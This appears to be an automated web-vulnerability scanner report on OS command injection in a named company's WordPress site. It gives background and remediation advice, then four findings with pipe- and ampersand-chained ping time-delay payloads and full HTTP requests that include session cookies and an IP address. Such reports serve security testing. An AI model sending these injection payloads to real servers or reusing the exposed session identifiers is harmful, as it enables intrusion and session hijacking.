Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:
The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defence can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defences.
The REST URL parameter 5 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the REST URL parameter 5. The application took 52604 milliseconds to respond to the request, compared with 468 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js|ping%20-n%2020%20127.0.0.1||x HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload |ping%20-c%2020%20127.0.0.1||x was submitted in the REST URL parameter 2. The application took 62088 milliseconds to respond to the request, compared with 94 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins|ping%20-c%2020%20127.0.0.1||x/seo-pressor/templates/css/styles.css HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;
The REST URL parameter 3 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload |ping%20-n%2020%20127.0.0.1||x was submitted in the REST URL parameter 3. The application took 56379 milliseconds to respond to the request, compared with 375 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins/superslider|ping%20-n%2020%20127.0.0.1||x/plugin-data/superslider/ssBase/blue/accordion.css HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;
The REST URL parameter 4 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.
The payload %26ping%20-n%2020%20127.0.0.1%26 was submitted in the REST URL parameter 4. The application took 44273 milliseconds to respond to the request, compared with 484 milliseconds for the original request, indicating that the injected command caused a time delay.
Request
GET /wp-content/plugins/wp-prettyphoto/js%26ping%20-n%2020%20127.0.0.1%26/jquery.prettyPhoto.js HTTP/1.1 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243.1296574377227827; __utmz=205318669.1296574600.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=LIGATT%20Security%20International; PHPSESSID=sim60iit4im0bv0a6hr2c5hdv1; __utma=205318669.1740185316.1296574600.1296574600.1296574600.1; __utmc=205318669; __utmb=205318669.6.10.1296574600;